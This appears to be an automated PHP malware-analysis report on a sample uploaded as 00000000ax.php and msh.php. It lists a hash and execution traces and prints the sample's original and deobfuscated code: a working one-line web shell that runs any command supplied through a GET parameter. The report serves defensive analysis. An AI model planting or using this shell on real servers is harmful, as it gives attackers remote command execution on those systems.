00000000ax.php, msh.php

md5: 9f3b30785509ade247e988a02f422054

Jump to:

Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)

Screenshot
Attributes
Execution
shell_exec (Deobfuscated, Original)

Input
_GET (Deobfuscated, Original)

Deobfuscated PHP code
<?php

shell_exec($_GET["cmd"]);
Execution traces
data/traces/9f3b30785509ade247e988a02f422054_trace-1676249480.2841.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 22:51:46.181945]
1	0	1	0.000269	393512
1	3	0	0.000338	393904	{main}	1		/var/www/html/uploads/msh.php	0	0
2	4	0	0.000381	393904	shell_exec	0		/var/www/html/uploads/msh.php	1	1	NULL
2	4	1	0.000411	393936
2	4	R			FALSE
1	3	1	0.000431	393904
			0.000460	314224
TRACE END   [2023-02-12 22:51:46.182190]

data/traces/9f3b30785509ade247e988a02f422054_trace-1676263120.7258.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:39:06.623654]
1	0	1	0.000319	393536
1	3	0	0.000428	393936	{main}	1		/var/www/html/uploads/00000000ax.php	0	0
2	4	0	0.000479	393936	shell_exec	0		/var/www/html/uploads/00000000ax.php	1	1	NULL
2	4	1	0.000512	393968
2	4	R			FALSE
1	3	1	0.000527	393936
			0.000574	314248
TRACE END   [2023-02-13 02:39:06.623947]

Generated HTML code
<html><head></head><body></body></html>
Original PHP code
<?php shell_exec($_GET["cmd"]); ?>

PHP Malware Analysis

00000000ax.php, msh.php

md5: 9f3b30785509ade247e988a02f422054

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code